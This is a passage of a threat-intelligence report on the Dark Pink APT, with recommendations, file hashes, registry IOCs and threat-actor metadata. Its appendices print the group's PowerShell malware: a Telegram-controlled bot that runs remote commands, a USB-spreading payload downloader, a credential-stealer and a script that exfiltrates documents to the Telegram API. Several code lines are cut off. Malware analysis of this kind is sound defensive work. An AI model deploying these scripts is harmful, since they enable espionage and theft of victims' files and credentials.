can\r\nalso be issued to all infected devices simultaneously. During our examination, we noticed several different kinds\r\nof commands. The functionalities of some of these commands overlap, but they are based on PowerShell\r\ncommands. For example, TelePowerBot can execute a simple standard console tool, such as whoami, or a\r\ncomplex PowerShell script.\r\nDuring infection, the threat actors execute several standard commands (e.g. net share, Get-SmbShare) to\r\ndetermine what network resources are connected to the infected device. If network disk usage is found, they will\r\nbegin exploring this disk to find files that may be of interest to them and potentially exfiltrate them. In the prior\r\nsection, we noted how Dark Pink threat actors carry out lateral movement. In this campaign, the threat actors\r\ncan also infect files on USB disks attached to the infected devices. The script below details how the threat actors\r\ncompile a list of network shares and the removable devices connected to the machine.\r\n(gwmi cim_logicaldisk|?{($_.drivetype -eq 2)-and(Test-path $($_.deviceid)\\\\)}).deviceid;\r\n(get-smbshare|?{($_.name -notlike \"*$\")-and($_.name -ne Users)-and($_.path -like *:\\\\*)}).path;\r\n(Get-SMBMapping|?{$_.Status -eq \"OK\"}).remotepath|?{$_ -notlike '*\\\\IPC$'}\r\nThe threat actors can also issue a command to take a screenshot of the desktop of the compromised device\r\nand save these in the %TEMP% directory. They then download the images by issuing the below command.\r\nAdd-type -AssemblyName System.Drawing\r\nAdd-Type -AssemblyName System.Windows.Forms\r\n[System.Windows.Forms.Screen]::AllScreens|%{\r\n $bounds =$_.bounds;\r\n if($bounds.width -lt 1920){$bounds.width=1920}\r\n if($bounds.height -lt 1080){$bounds.height=1080}\r\n $image = New-Object Drawing.Bitmap $bounds.width, $bounds.height\r\n $graphics = [Drawing.Graphics]::FromImage($image)\r\n $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size)\r\n $screen_file = \"$env:tmp\\\\$($_.DeviceName.replace('\\\\\\\\.\\\\',''))_$((get-date).tostring('yyyyMMddH\r\n $image.Save($screen_file)\r\n $graphics.Dispose()\r\n $image.Dispose()\r\n $screen_file\r\n}\r\nConclusion\r\nhttps://www.group-ib.com/blog/dark-pink-apt/\r\nPage 19 of 24\n\nAPT groups come and go, but the preliminary findings of Group-IB’s research into Dark Pink APT\r\ndemonstrates how threat actors can change course, leverage new TTPs, and achieve devastating results. The\r\nthreat actors behind Dark Pink were able, with the assistance of their custom toolkit, to breach the defenses of\r\ngovernmental and military bodies in a range of countries in the APAC and European regions. Dark Pink’s\r\ncampaign once again underlines the massive dangers that spear-phishing campaigns pose for organizations, as\r\neven highly advanced threat actors use this vector to gain access to networks, and we recommend that\r\norganizations continue to educate their personnel on how to detect these sorts of emails.\r\nAt this stage, Group-IB researchers can confidently say that Dark Pink was behind the successful breaches of at\r\nleast seven organizations, although we believe that this number could be higher. In line with Group-IB’s zero-tolerance policy to cybercrime, our analysts will continue their diligent efforts to uncover Dark Pink’s origin and\r\nwork to uncover more of the unique or peculiar TTPs utilized by this group. We will continue to issue proactive\r\nnotifications to any organization we find to have been breached by this particular threat group.\r\nIn this blog, we attempted to reveal how Group-IB’s proprietary Threat Intelligence system, which detects\r\nattacks automatically, can identify the mechanics behind ongoing threat campaigns. Our clients are the first to\r\nbe informed about Dark Pink, along with other new APT groups that may appear on the horizon, and they\r\nare also the first to obtain the names of compromised organizations, which helps them avoid supply-chain attacks\r\nand make their network infrastructure more secure.\r\nRecommendations\r\nUse modern email protection measures to prevent initial compromise via spear-phishing emails. We\r\nrecommend Group-IB’s Business Email Protection, which is able to counter these threats effectively.\r\nOrganizations should ensure they foster a cybersecurity culture in their workplace, which includes\r\nsufficient training to staff on how to identify phishing emails.\r\nEnsure that your security measures allow for proactive threat hunting that can help identify threats that\r\ncannot be detected automatically.\r\nLimit access to file-sharing resources, with the exception of those used within the organization.\r\nMonitor the creation of LNK files in unusual locations, such as network drives and USB devices.\r\nEnsure that you observe any use of commands and built-in tools that are frequently used for collecting\r\ninformation about the system and files.\r\nMaintaining a secure organization requires ongoing vigilance, and using a proprietary solution such as\r\nGroup-IB Threat Intelligence can help organizations shore up their security posture by equipping security\r\nteams with the latest insights into new and emerging threats.\r\nIndicators of compromise\r\nFile indicators:\r\nCucky: MD5: 926027F0308481610C85F4E3E433573B SHA1:\r\n24F65E0EE158FC63D98352F9828D014AB239AE16 SHA256:\r\n9976625B5A3035DC68E878AD5AC3682CCB74EF2007C501C8023291548E11301A Ctealer Loader: MD5:\r\n728AFA40B20DF6D2540648EF845EB754 SHA1: D8DF672ECD9018F3F2D23E5C966535C30A54B71D\r\nhttps://www.group-ib.com/blog/dark-pink-apt/\r\nPage 20 of 24\n\nSHA256: C60F778641942B7B0C00F3214211B137B683E8296ABB1905D2557BFB245BF775 Packed ctealer:\r\nMD5: 7EAF1B65004421AC07C6BB1A997487B2 SHA1: 18CA159183C98F52DF45D3E9DB0087E17596A866\r\nSHA256: E3181EE97D3FFD31C22C2C303C6E75D0196912083D0C21536E5833EE7D108736 MD5:\r\n732091AD428419247BCE87603EA79F00 SHA1: 142F909C26BD57969EF93D7942587CDF15910E34\r\nSHA256: E45DF7418CA47A9A4C4803697F4B28C618469C6E5A5678213AB81DF9FCC9FD51\r\nFile path:\r\n$env:tmp\\backuplog $env:tmp\\backuplog1 $env:appdata\\archive.zip $env:appdata\\telegram.txt\r\n$env:tmp\\afkslfsa.csv $env:tmp\\AB.zip $Env:tmp\\AB\r\nScheduled task name:\r\nMutex:\r\ngwgXSznM-Jz92k33A-uRcCCksA-9XAU93r5\r\nRegistry path:\r\nHKCU:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell HKCU\\Environment\\OSBuild\r\nHKCU\\Environment\\STMP HKCU\\Environment\\SYSPS HKCR:\\zolfile\\shell\\open\\command\r\nHKCR:\\zolofile\\shell\\open\\command\\zolo HKCU:\\Environment\\guid HKCU:\\Environment\\Update\r\nHKCU:\\Environment\\UserInitMprLogonScript HKCU:\\SOFTWARE\\\\Classes\\\\abcdfile\\shell\\abcd\\\r\nHKCU:\\SOFTWARE\\Classes\\.4ID\\ HKCU:\\SOFTWARE\\Classes\\.abcd HKCU:\\SOFTWARE\\Classes\\.psr\r\nHKCU:\\SOFTWARE\\Classes\\.zol HKCU:\\SOFTWARE\\Classes\\.zolo\r\nHKCU:\\SOFTWARE\\Classes\\4IDfile\\shell\\open\\command\r\nHKCU:\\SOFTWARE\\Classes\\4IDfile\\shell\\open\\command\\\r\nHKCU:\\SOFTWARE\\Classes\\4IDfile\\shell\\open\\command\\DelegateExecute\r\nHKCU:\\SOFTWARE\\Classes\\4IDfile\\shell\\open\\command\\DelegateExecute\\\r\nHKCU:\\SOFTWARE\\Classes\\abcdfile\\shell HKCU:\\SOFTWARE\\Classes\\abcdfile\\shell\\aaaa\r\nHKCU:\\SOFTWARE\\Classes\\abcdfile\\shell\\abcd HKCU:\\SOFTWARE\\Classes\\abcdfile\\shell\\open\\command\r\nHKCU:\\SOFTWARE\\Classes\\abcdfile\\shell\\open\\command\\abcd\r\nHKCU:\\SOFTWARE\\Classes\\abcdfile\\shell\\open\\command\\DelegateExecute\r\nHKCU:\\SOFTWARE\\Classes\\psrfile\\shell\\open\\command\r\nHKCU:\\SOFTWARE\\Classes\\psrfile\\shell\\open\\command -Name DelegateExecute\r\nHKCU:\\SOFTWARE\\Classes\\zolfile\\shell\\open\\command\\DelegateExecute\r\nHKCU:\\SOFTWARE\\Classes\\zolfile\\shell\\open\\command\\zolo\r\nHKCU:\\SOFTWARE\\Classes\\zolofile\\shell\\open\\command\r\nHKCU:\\SOFTWARE\\Classes\\zolofile\\shell\\open\\command -Name DelegateExecute\r\nHKCU:\\SOFTWARE\\Classes\\zolofile\\shell\\open\\command -Name DelegateExecute\r\nHKCU:\\SOFTWARE\\Classes\\zolofile\\shell\\open\\command -Name zolo\r\nHKCU:\\SOFTWARE\\Classes\\zolofile\\shell\\open\\command -Name zolo -Value\r\nHKCU:\\SOFTWARE\\Classes\\zolofile\\shell\\open\\command\\zolo\r\nHKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Forfiles\r\nhttps://www.group-ib.com/blog/dark-pink-apt/\r\nPage 21 of 24\n\nHKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Psr\r\nHKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Recents\r\nAPPENDIX A. TelePowerBot\r\n[System.Net.ServicePointManager]::SecurityProtocol=@(\"Tls12\",\"Tls11\",\"Tls\",\"Ssl3\")\r\n$token=\"CHANGED\"\r\n$id=CHANGED\r\n$mid=(gp \"HKCU:\\\\Environment\" -name Update).Update\r\n$guid = (gp \"HKCU:\\\\Environment\" -name guid).guid\r\n$ip=irm \"https://ifconfig.me/ip\"\r\nif( -not (New-Object System.Threading.Mutex($false, $guid)).WaitOne(1)){\r\n exit\r\n}\r\nif($mid -and $guid){\r\n irm -Uri \"https://api.telegram.org/bot$($token)/sendMessage?chat_id=$($id)\u0026text=$guid :: $env:COM\r\n}\r\nelse {\r\n $guid = [guid]::NewGuid().guid\r\n Set-ItemProperty \"HKCU:\\\\Environment\" -name \"GUID\" -value $guid\r\n irm -Uri \"https://api.telegram.org/bot$($token)/sendMessage?chat_id=$($id)\u0026text=$guid :: $env:COM\r\n}\r\nif($mid -isnot [int]){\r\n $mid = 0\r\n}\r\nwhile(1){\r\n Start-Sleep 60;\r\n (irm -Uri \"https://api.telegram.org/bot$($token)/getUpdates\").result|%{\r\n if ($mid -lt $_.update_id) {\r\n $mid=$_.update_id;\r\n $name,$task=$_.message.text -split \" :: \";\r\n if ( ($name -like $ip) -or ($name -like $env:COMPUTERNAME) -or ($name -like $guid) -or ($\r\n $message = $($task | iex)2\u003e\u00261 | Out-String;\r\n if (\"\" -eq $message){\r\n $message=\"Task Done!\"\r\n }\r\n $b=0;\r\n while ($b -lt $message.Length) {\r\n $c = 4000;\r\n if (($c + $b) -gt $message.Length){$c=$message.Length % 4000}\r\n irm -Uri \"https://api.telegram.org/bot$($token)/sendMessage?chat_id=$($id)\u0026text=$\r\n $b+=$c\r\n }\r\n }\r\n }\r\n Set-ItemProperty \"HKCU:\\\\Environment\" -name \"Update\" -value $mid\r\nhttps://www.group-ib.com/blog/dark-pink-apt/\r\nPage 22 of 24\n\n}\r\n}\r\nAPPENDIX B. PowerShell script to later movement over removable device\r\n[Net.ServicePointManager]::SecurityProtocol=@(\"Tls12\",\"Tls11\",\"Tls\",\"Ssl3\");\r\n$ErrorActionPreference=\"Continue\";\r\n$Query = \"select * from __InstanceCreationEvent within 5 where TargetInstance ISA 'Win32_LogicalDisk\r\n$Action = {\r\n (gwmi cim_logicaldisk|?{($_.drivetype -eq 2)-and(Test-path \"$($_.deviceid)\\\")}).DeviceID|%{\r\n $uri = \"https://raw.githubusercontent.com/efimovah/abcd/main/xxx.gif\";\r\n Start-BitsTransfer -Source $uri -Destination \"$Env:tmp\\xxx.zip\";\r\n Expand-Archive -Path \"$env:temp\\xxx.zip\" -DestinationPath \"$env:temp\" -force\r\n cp \"$env:temp\\xxx\" \"$_\\dism\" -Recurse -Force;\r\n sc \"$_\\system.bat\" -value \"@echo off`ncd %cd%dism`nstart dism.exe`nexit\";\r\n attrib +s +h \"$_\\dism\";attrib +s +h \"$_\\dism\\*.*\";attrib +s +h \"$_\\system.bat\";\r\n (Gci \"$_\\\" -Directory -force)|?{$_.name -notin ('dism','$RECYCLE.BIN','System Volume Informat\r\n attrib +s +h \"$($_.fullname)\"\r\n $WshShell = New-Object -comObject WScript.Shell\r\n $Shortcut = $WshShell.CreateShortcut(\"$($_.fullname).lnk\")\r\n $Shortcut.TargetPath = \"%SystemRoot%\\System32\\cmd.exe\"\r\n $Shortcut.Arguments = \"/c start explorer $($_.name) \u0026\u0026 system.bat \u0026\u0026 exit\"\r\n $Shortcut.IconLocation = \"%SystemRoot%\\System32\\SHELL32.dll,4\"\r\n $Shortcut.WorkingDirectory = \"%cd%\"\r\n $Shortcut.Save()\r\n }\r\n }\r\n};\r\nRegister-WmiEvent -Query $Query -Action $Action -SourceIdentifier USBFlashDrive\r\nAPPENDIX C. PowerShell script to theft of credentials\r\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;\r\n[Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object System.Net.WebClient).Down\r\nStart-Sleep 60;\r\ncp -path \"$env:tmp\\\\backuplog\" -Destination \"$env:tmp\\\\backuplog1\" -recurse -force; $file = \"$env:tmp\r\n$ascii = [System.Text.Encoding]::ascii;\r\nCompress-Archive -Path $File -Destination \"$file.zip\" -Force;\r\n$file = \"$file.zip\"\r\n$reg = \"HKCU:\\\\Environment\"\r\n$token,$chat_id = (gp $reg -name GUID).GUID -split \"::\"\r\nAdd-Type -AssemblyName System.Net.Http\r\n$form = new-object System.Net.Http.MultipartFormDataContent\r\n$form.Add($(New-Object System.Net.Http.StringContent $Chat_ID), 'chat_id')\r\n$Content = [System.IO.File]::ReadAllBytes($file)\r\nhttps://www.group-ib.com/blog/dark-pink-apt/\r\nPage 23 of 24\n\n$byte = New-Object System.Net.Http.ByteArrayContent ($Content, 0, $Content.Length)\r\n$byte.Headers.Add('Content-Type','text/plain')\r\n$name = $ascii.getstring($ascii.getbytes(\"$($env:COMPUTERNAME)_$($file)\")) -replace ':|\\\\\\\\|\\\\?','_'\r\n$form.Add($byte, 'document', $name)\r\n$ms = new-object System.IO.MemoryStream\r\n$form.CopyToAsync($ms).Wait()\r\nirm -Method Post -Body $ms.ToArray() -Uri \"\" -ContentType $form.Headers.ContentType.ToString()\r\nrm $file -Force -Recurse\",\r\nAPPENDIX D. PowerShell script to exfiltrate documents from common network resource\r\n$extentions = @('.doc','.docx','.xls','.xlsx','.ppt','.pptx','.pdf');\r\n$file = \"$env:tmp\\\\documents_$((get-date).tostring('yyyyMMddHHmmss')).csv\"\r\ngdr -PsProvider FileSystem | Select Root | %{gci -Path $_.Root -Recurse -ErrorAction SilentlyContinue\r\n$ascii = [System.Text.Encoding]::ascii;\r\nCompress-Archive -Path $File -Destination \"$file.zip\" -Force;\r\n$file = \"$file.zip\"\r\n$chat_id=CHANGED\r\n$token=\"CHANGED\"\r\nAdd-Type -AssemblyName System.Net.Http\r\n$form = new-object System.Net.Http.MultipartFormDataContent\r\n$form.Add($(New-Object System.Net.Http.StringContent $Chat_ID), 'chat_id')\r\n$Content = [System.IO.File]::ReadAllBytes($file)\r\n$byte = New-Object System.Net.Http.ByteArrayContent ($Content, 0, $Content.Length)\r\n$byte.Headers.Add('Content-Type','text/plain')\r\n$name = $ascii.getstring($ascii.getbytes(\"$($env:COMPUTERNAME)_$($file)\")) -replace ':|\\\\\\\\|\\\\?','_'\r\n$form.Add($byte, 'document', $name)\r\n$ms = new-object System.IO.MemoryStream\r\n$form.CopyToAsync($ms).Wait()\r\nirm -Method Post -Body $ms.ToArray() -Uri \"https://api.telegram.org/bot$token/sendDocument\" -ContentT\r\nrm $file -Force -Recurse\r\nSource: https://www.group-ib.com/blog/dark-pink-apt/\r\nhttps://www.group-ib.com/blog/dark-pink-apt/\r\nPage 24 of 24", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.group-ib.com/blog/dark-pink-apt/" ], "report_names": [ "dark-pink-apt" ], "threat_actors": [ { "id": "fd4c3ddd-11cc-4192-9c94-ff107d7f8492", "created_at": "2023-02-18T02:04:24.06294Z", "updated_at": "2026-04-10T02:00:04.644528Z", "deleted_at": null, "main_name": "Dark Pink", "aliases": [ "Saaiwc Group" ], "source_name": "ETDA:Dark Pink", "tools": [ "Ctealer", "Cucky", "KamiKakaBot", "LOLBAS", "LOLBins", "Living off the Land", "PowerSploit", "TelePowerBot", "ZMsg" ], "source_id": "ETDA", "reports": null }, { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e698860d-57e8-4780-b7c3-41e5a8314ec0", "created_at": "2022-10-25T15:50:23.287929Z", "updated_at": "2026-04-10T02:00:05.329769Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "APT41", "Wicked Panda", "Brass Typhoon", "BARIUM" ], "source_name": "MITRE:APT41", "tools": [ "ASPXSpy", "BITSAdmin", "PlugX", "Impacket", "gh0st RAT", "netstat", "PowerSploit", "ZxShell", "KEYPLUG", "LightSpy", "ipconfig", "sqlmap", "China Chopper", "ShadowPad", "MESSAGETAP", "Mimikatz", "certutil", "njRAT", "Cobalt Strike", "pwdump", "BLACKCOFFEE", "MOPSLED", "ROCKBOOT", "dsquery", "Winnti for Linux", "DUSTTRAP", "Derusbi", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null }, { "id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31", "created_at": "2023-01-06T13:46:38.376868Z", "updated_at": "2026-04-10T02:00:02.949077Z", "deleted_at": null, "main_name": "Cleaver", "aliases": [ "G0003", "Operation Cleaver", "Op Cleaver", "Tarh Andishan", "Alibaba", "TG-2889", "Cobalt Gypsy" ], "source_name": "MISPGALAXY:Cleaver", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "fbe45970-1e9e-4a82-bc06-46317a248479", "created_at": "2026-02-03T02:00:03.45132Z", "updated_at": "2026-04-10T02:00:03.947304Z", "deleted_at": null, "main_name": "DarkPink", "aliases": [ "Saaiwc" ], "source_name": "MISPGALAXY:DarkPink", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434083, "ts_updated_at": 1775826742, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/ecc44c1803892dc2a4d04590c41c1245fff5e536.pdf", "text": "https://archive.orkl.eu/ecc44c1803892dc2a4d04590c41c1245fff5e536.txt", "img": "https://archive.orkl.eu/ecc44c1803892dc2a4d04590c41c1245fff5e536.jpg" } }